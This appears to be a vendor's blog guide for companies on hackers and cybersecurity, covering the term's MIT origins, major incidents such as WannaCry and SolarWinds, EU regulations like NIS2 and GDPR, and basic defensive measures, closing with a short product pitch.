Hackers and your company: from MIT in the '60s to the major incidents (Stuxnet, WannaCry, SolarWinds, Colonial Pipeline) and the regulatory reality of 2026

The word hacker is one of the most loaded and most misunderstood terms in contemporary tech vocabulary. To the general public, it's associated with criminals who break into systems to steal money or information. To many in the tech industry, it still refers to its original meaning — someone with deep technical knowledge who explores and modifies systems, not necessarily with malicious intent.

For a company, the practical consequences don't depend on etymology but on operational reality: cyberattacks are common, costly, and growing, and the decision of how much to invest in cybersecurity is one that affects operational viability, regulatory compliance, and reputation. This guide covers the historical context (because it informs the present), the major documented incidents (because they teach patterns), the European regulatory framework of 2026 (because it defines obligations), and the basic measures that genuinely reduce risk.

The origin of the term: MIT, the Tech Model Railroad Club, 1960s

The word "hacker" in its modern technical sense was coined at MIT's Tech Model Railroad Club (TMRC) in the late 1950s and early 1960s. The TMRC was a student club that built elaborate model train layouts with sophisticated electromechanical systems. Members of the Signals and Power subclub —which handled the electronics of the layouts— used "hack" to describe a creative technical job or intervention, especially one that achieved something notable through elegant or unconventional means.

When those same students began to get access to MIT's first computers (the TX-0 starting in 1956, the PDP-1 from 1961), they carried the term into the new context. "Hacker" came to designate someone who mastered these systems at a deep level, explored their capabilities, and extended them with technical creativity.

Steven Levy documented this culture in his book Hackers: Heroes of the Computer Revolution (1984), where he formalized the original "hacker ethic": information should be free, authority should be distrusted, hackers are judged by their hacks and not by their formal credentials, you can create art and beauty with a computer, computers can change your life for the better.

This culture is in the DNA of organizations like the Free Software Foundation (Richard Stallman, 1985), Linux (Linus Torvalds, 1991), Apache (1995), Wikipedia, and open source communities in general. When people talk about "Apple" in its origins (Wozniak and Jobs building computers in a garage), about Silicon Valley culture, about the radical decisions of the internet — all of it derives from the original hacker culture.

The pejorative sense of the term —hacker as cybercriminal— became popular in the media from the mid-'80s with cases like Kevin Mitnick (arrested in 1995), although the technical community itself has, with mixed success, tried ever since to maintain the distinction between the original hacker (constructive) and the cracker (destructive). In 2026, the popular use of the term has clearly settled on the information-security meaning, although the original sense persists in technical circles.

The operational distinction: black hat, white hat, gray hat

To understand the real actors in the cybersecurity ecosystem, the industry uses a taxonomy that became popular around the '90s:

Black hat hackers. The criminals. They attack systems for their own benefit (theft, ransomware, espionage, sabotage) or for ideological reasons ("hacktivism"). They operate illegally. They span a spectrum from amateur individuals to sophisticated criminal organizations and state actors (APTs — Advanced Persistent Threats).

White hat hackers. Security professionals who use the same skills to defend. Pentesters (penetration testers) whom companies hire to identify vulnerabilities before the black hats do. Bug bounty hunters who report vulnerabilities to companies in exchange for a reward (programs like HackerOne, Bugcrowd). Academic security researchers.

Gray hat hackers. In between. They may find vulnerabilities without explicit permission and report them to the affected company (sometimes with an expectation of payment, sometimes not). The line between legal and illegal is blurry because accessing systems without permission is typically a crime even when the intent is to notify.

Other relevant terms:

Script kiddies. Attackers with little technical skill who use tools made by others. Most large-scale automated attacks are carried out by script kiddies with kits downloaded from forums.

APT (Advanced Persistent Threat). An organized group with significant resources that carries out complex, long-term operations. They usually have state backing (Chinese APTs like APT1, Russian ones like Fancy Bear / APT28, North Korean ones like Lazarus). They attack specific organizations with strategic objectives.

Hacktivists. They attack for political or ideological reasons. Anonymous is a historical example. In 2026, groups like Killnet and NoName057(16) are examples tied to geopolitical conflicts.

Insider threats. The attacker is internal — a disgruntled employee, a contractor, a former employee with access that wasn't revoked. Statistically, a significant proportion of serious incidents involve insider threats.

The major incidents worth knowing

Knowing documented cases helps you understand what can happen and make informed investment decisions:

Stuxnet (discovered 2010). Considered the first cyberweapon used in a real operation. A sophisticated computer worm, attributed to a collaboration between the United States and Israel, designed specifically to sabotage the Iranian nuclear program. It attacked Siemens PLC controllers in uranium enrichment plants in Natanz. It's a paradigmatic example of how cyberattacks can have consequences in the physical world. Its discovery by the Belarusian firm VirusBlokAda that year changed the industrial perception of critical-infrastructure cybersecurity.

Sony Pictures (November 2014). Attackers (attributed to North Korea / the Lazarus Group) accessed and leaked internal emails, salaries, unreleased films, and employee data. The official motivation: punishment for the film "The Interview" about Kim Jong-un. It demonstrated that even large companies with resources could be significantly compromised. Sony temporarily pulled the film before releasing it with limited distribution.

WannaCry (May 2017). Ransomware that infected more than 200,000 computers in 150 countries within days. It exploited the EternalBlue vulnerability (originally developed by the US NSA, leaked by The Shadow Brokers in April 2017). It hit hospitals of the UK's NHS, paralyzing them, as well as Renault factories, Telefónica, FedEx, and thousands of organizations. The attack was partially stopped when Marcus Hutchins (a 22-year-old British researcher) accidentally discovered a "kill switch" in the code and registered the domain that activated it. Attributed to North Korea.

NotPetya (June 2017). Apparently ransomware, but really a wiper (permanent destruction). It dramatically affected Maersk (which had to rebuild 4,000 servers and 45,000 PCs in 10 days), Mondelez, FedEx, Merck, and Saint-Gobain. Estimated damages: more than 10 billion dollars. It originated in compromised Ukrainian accounting software. Attributed to Russian military intelligence (GRU).

Equifax (July-September 2017). A breach that exposed the personal data of 147.9 million people in the US (including SSNs). The CEO resigned. The company paid fines of 700 million dollars in a settlement with the FTC and others. A paradigmatic case of how an unpatched vulnerability (Apache Struts) can collapse corporate reputation.

SolarWinds / Sunburst (discovered December 2020). A supply-chain compromise: attackers (attributed to APT29 / Cozy Bear, associated with Russia's SVR) inserted malicious code into legitimate updates of SolarWinds Orion (network management software). It was distributed to approximately 18,000 customer organizations, including US federal agencies (Treasury, Commerce, DHS, NIH), Microsoft, Cisco, and Intel. It's an obligatory reference for how a compromised vendor can be a vector for attacking its entire customer base.

Colonial Pipeline (May 2021). Ransomware (attributed to the DarkSide group) that shut down the main fuel pipeline on the US East Coast. The company paid 4.4 million dollars in bitcoin as ransom (although the FBI later recovered part of it). The incident triggered fuel shortages and panic buying. It demonstrated the concrete risk to critical infrastructure.

Log4Shell / Log4j (December 2021). A critical vulnerability in a Java library (Log4j) used in hundreds of thousands of applications. The initial disclosure created worldwide panic because the library was ubiquitous and exploitation was trivial. Companies spent entire nights patching systems. It demonstrated the fragility of the open source software chain that modern systems depend on.

Lapsus$ (2022). A young group (some members were minors) that compromised Nvidia, Samsung, Microsoft, Okta, and T-Mobile, among others, through a combination of phishing, social engineering, and the purchase of credentials. It demonstrated that attacks with little technical sophistication can succeed if the victim's security culture is poor.

MOVEit Transfer (May-June 2023). A zero-day vulnerability in the MOVEit file transfer software, exploited en masse by the Cl0p group. More than 2,700 organizations affected, with the data of approximately 95 million people exposed. British Airways, BBC, Shell, Aer Lingus, government agencies. Another case of a supply-chain attack.

Change Healthcare (February 2024). A subsidiary of UnitedHealth Group, a transaction processor that affects much of the US healthcare system. Ransomware (attributed to ALPHV/BlackCat) paralyzed medical payments for weeks. UnitedHealth paid 22 million dollars in ransom. The data of approximately 100 million people was compromised. Total costs were estimated in the billions of dollars considering the impact on the entire healthcare system.

CrowdStrike incident (July 2024). Although it was not an attack but a faulty update, it took down 8.5 million Windows devices worldwide, including airlines, hospitals, and financial systems. Microsoft put the losses in the billions. It illustrates how dependence on single vendors creates systemic risk even without malicious actors.

This list is not exhaustive, but the incidents cited are the ones that have defined how enterprise cybersecurity has been thought about over the past 15 years.

The most common types of attacks in 2026

Beyond the high-profile incidents, the threats that mid-sized companies face on a daily basis:

Phishing. The most common initial attack vector. Fraudulent emails that look legitimate, used to extract credentials or install malware. Variants: spear phishing (targeted at a specific person), whaling (targeted at executives), vishing (by phone), smishing (by SMS), business email compromise (BEC), which typically involves the CEO requesting urgent transfers (the victim is usually the CFO or finance department).

Ransomware. Encryption of data with a ransom demand. A sophisticated business model in 2026 with organized groups, "ransomware-as-a-service" (RaaS) where operators rent infrastructure to "affiliates" who carry out the attacks. Typical payments range from hundreds of thousands to millions depending on the size of the victim.

Credential stuffing. Using credentials leaked from other breaches to try to access your systems. It works because people reuse passwords. Massive credential breaches have occurred — databases like Have I Been Pwned hold billions of known credentials.

Supply chain attacks. Compromising a vendor to reach its customers. SolarWinds and MOVEit are paradigmatic examples. Increasingly relevant as companies depend on more external services.

Zero-day exploits. Vulnerabilities unknown to the vendor. Sophisticated attackers use them before patches exist.

DDoS (Distributed Denial of Service). Flooding servers with massive traffic to make them inaccessible. Less sophisticated, but it can cause significant losses for sites that depend on continuous operation.

Insider threats. Malicious or careless employees. The acts aren't always malicious — an employee who sends sensitive data out by mistake can cause the same damage as a malicious one.

Social engineering. Manipulating people into revealing information or taking actions. The most common technique attackers use, more so than technical exploits. Kevin Mitnick (after being arrested, he became a security professional) wrote entire books on social engineering techniques.

Cryptojacking. Compromising systems to mine cryptocurrencies. Less visible than ransomware but costly (electricity consumption, system degradation).

API attacks. As companies expose more and more APIs, vulnerabilities in APIs (poor authentication, lack of rate limiting, data exposure) have become a significant attack vector.

Supply chain phishing and deepfakes. In 2026, sophisticated attacks use generative AI to create emails, audio, and even videos that are nearly indistinguishable from legitimate communications. There are documented cases of a CEO deepfake requesting a transfer with a cloned voice.

The European regulatory framework in 2026

For companies operating in the European market, the regulatory obligations related to cybersecurity are significant:

GDPR (Regulation (EU) 2016/679). In force since May 2018. It establishes the protection of personal data with fines of up to 4% of global annual revenue. Data breaches must be reported to the supervisory authority within 72 hours. Cases of significant fines: Meta fined €1.2 billion in May 2023 for data transfers to the US; Amazon €746 million in 2021; Instagram (Meta) €405 million in 2022.

NIS2 Directive (Directive (EU) 2022/2555). Successor to the original NIS Directive of 2016. In force since October 2024. It dramatically expands the scope of cybersecurity regulation. Specific obligations for "essential entities" and "important entities" in 18 sectors including energy, transport, healthcare, water, digital infrastructure, manufacturing, food, waste management, postal services, and space. The obligations include minimum technical and organizational measures, incident management, supply-chain cybersecurity, and mandatory training for management bodies. Fines of up to €10 million or 2% of global annual revenue. For many SMEs that were previously outside the scope of cybersecurity regulation, NIS2 now obligates them.

Cyber Resilience Act (Regulation (EU) 2024/2847). Approved in October 2024, with phased entry into force through December 2027. It requires manufacturers of products with digital elements (hardware, software) to meet cybersecurity requirements throughout the product's entire life cycle.

DORA (Digital Operational Resilience Act, Regulation (EU) 2022/2554). Specific to the financial sector. Applicable since January 2025. It requires financial entities to have robust ICT risk management processes, resilience testing, and management of third-party providers.

Schrems II and international transfers. The CJEU ruling of July 2020 (Schrems II) invalidated the EU-US Privacy Shield and significantly raised the requirements for transferring personal data outside the EU. The EU-US Data Privacy Framework of July 2023 partially restored the framework, but it remains the subject of litigation.

In Spain specifically: the AEPD (Spanish Data Protection Agency) has an active history of investigation and sanction. AEPD fines number in the hundreds per year, many of them against Spanish companies. INCIBE (the National Cybersecurity Institute) offers free services to companies, especially SMEs, which are worth taking advantage of.

The measures that reduce 80% of the risk

Regardless of company size, there are basic measures that dramatically reduce risk. Implementing all of them is not optional in 2026:

Two-factor authentication (2FA / MFA) on everything. The single most impactful change. With it enabled, leaked credentials are no longer sufficient. Especially critical for corporate email, financial systems, and admin panels.

A password manager. 1Password, Bitwarden, Dashlane. It enables unique, long passwords for each service. Password reuse is the origin of credential stuffing.

Regular, tested backups. Automatic backups, in a location separate from the main system, with periodic testing that they can be restored. Without a tested backup, ransomware can be fatal.

Timely updates (patches). Most exploits take advantage of known vulnerabilities with available patches. Unpatched systems are easy targets. Formal update-management processes reduce vulnerability windows.

The principle of least privilege. Each user and system has only the permissions it needs for its function. It reduces the damage when a user is compromised.

Immediate revocation of access on departure. Employees who leave should have all their access revoked that same day. Real cases: former employees with access months later who get in and cause deliberate damage.

Continuous team training. Phishing is the most common vector, and the human factor is the biggest vulnerability. Periodic phishing simulations, recurring training, a culture of "ask first." KnowBe4 and similar offer training platforms.

Basic email security. SPF, DKIM, and DMARC configured on the domain to reduce spoofing. Advanced email filters.

Endpoint protection. Modern antivirus (or rather EDR — Endpoint Detection and Response), not just '90s-style antivirus. CrowdStrike, SentinelOne, Microsoft Defender. It protects the team's devices individually.

Disk encryption on devices. BitLocker on Windows, FileVault on Mac. If a laptop is lost, the data is not accessible to whoever finds it.

An incident response plan. Documented, known, rehearsed. Who does what when an incident occurs. Without a plan, the first hours (which are critical) are lost in confusion.

Regular audit of access and permissions. Quarterly or semiannually. Review who has access to what, and remove unnecessary access.

Documented GDPR compliance. Procedures for managing personal data, a record of processing activities, a clear privacy policy, a legal basis for each processing operation.

Cybersecurity insurance. For companies with significant assets, specific coverage for incidents (ransom, recovery, damages). Pricing depends on the measures implemented.

These basic measures, all implemented correctly, probably reduce 80% of everyday risk. The advanced measures (red teaming, 24/7 SOC, threat intelligence) are additional investment for companies with a higher risk profile.

The reality of the cost of an incident

For a company wondering whether the investment in cybersecurity justifies the cost, it's worth knowing the documented figures:

IBM publishes its Cost of a Data Breach Report annually, based on research with the Ponemon Institute. Some figures from the 2024 report:

• Average global cost of a data breach: 4.88 million dollars.
• In the healthcare sector: 9.77 million.
• In the financial sector: 6.08 million.
• Average time to identify a breach: 194 days; to contain it: 64 additional days (total ~258 days).
• Cost of a breach when identified in less than 200 days vs. more: a difference of 1.02 million dollars.

For Spanish SMEs, the costs are proportionally lower in absolute terms but comparable or greater in terms of impact on the business. Ransomware that paralyzes operations for a week can be fatal for small companies with tight cash flow.

Common security mistakes at mid-sized companies

"We're not big enough to be a target." False. Massive automated attacks don't discriminate by size. SMEs are attractive targets precisely because they have fewer defenses.

Buying tools without processes. A security tool without a process for using it doesn't protect you. Culture and discipline are as important as the software.

Sharing credentials over chat or email. A common practice in small companies. Any compromise of the account where they were shared exposes all the services.

Not revoking access when employees leave. Lists of employees with system access that are never audited are a source of incidents.

Underestimating vendor risk. If a vendor with access to your system is compromised, you can be too. Vendor auditing and contracts with security clauses.

Not documenting a response plan. When an incident occurs, the first hours are critical. Without a plan, they're lost.

Paying ransom without a protocol. Paying can be illegal in some jurisdictions (the US with OFAC sanctions). Without legal advice and cooperation with the authorities, a rushed decision can make the situation worse.

Relying only on the firewall. Perimeter defense is necessary but insufficient. Most modern attacks come from the inside (phishing, supply chain, insiders).

Not testing backups. Backups that exist but have never been tested may not work when they're needed. Testing restorations periodically is fundamental.

Ignoring training. An untrained team is the biggest vulnerability. Investment in training is among the most cost-effective in security.

Complying with GDPR only on paper. A published privacy policy that isn't followed internally. Incidents reveal the operational reality.

Hackers / cybersecurity and creative operations

For an agency or creative team, security considerations are specific but no less important:

Access to client files. Design/production teams handle raw files, editable files, and client data. Compromising these can mean severe reputational damage and a GDPR violation.

The client's social media accounts. If you manage social media for clients, their credentials live in your system. A compromise can take control of brands that aren't yours.

Collaboration platforms. Slack, Teams, Notion, Drive — where work in progress lives. Compromised access makes it possible to leak sensitive information.

Remote work with personal devices. Freelancers connecting to client systems from unprotected devices.

That coordination is the discipline of creative operations: approval workflows must include control over who accesses what, brand management must account for protecting assets, and operational processes must include the management of credentials, access, and devices.

At Polimake, that logic is built into the product: Studio, Studio, and Media operate with access controls, robust authentication, and traceability of who accesses what. Security is not an optional feature but an operational requirement in the infrastructure of creative operations.

---

If you lead technology, operations, marketing, or any role with responsibility over data or systems, and you arrived here looking for an answer about hackers and your company, the most useful thing you can take from this article is probably the combination of three ideas: cyber risk is real, quantifiable, and growing (the documented incidents show replicable patterns), basic measures drastically reduce risk without requiring enormous investment (2FA, tested backups, updates, training, the principle of least privilege), and the European regulatory framework of 2026 (NIS2, GDPR) has made security investment less optional than ever with fines that can be existential for mid-sized companies. Cybersecurity went from "an IT topic" to "a management topic" a decade ago; ignoring that shift in 2026 is a negligent decision.

To round this out, bots and exploits on social media covers specific threats on social networks, consumerism covers the consumer-protection legal framework that intersects with privacy, and SaaS covers the services whose proper use significantly affects your security posture.

Quick references

• Bots and exploits on social media — specific threats on social platforms.
• Consumerism — the related consumer-protection legal framework.
• SaaS — the services whose configuration affects security.
• The cloud — the underlying infrastructure with its security particularities.
• Hosting (web host) — where the website lives and its security.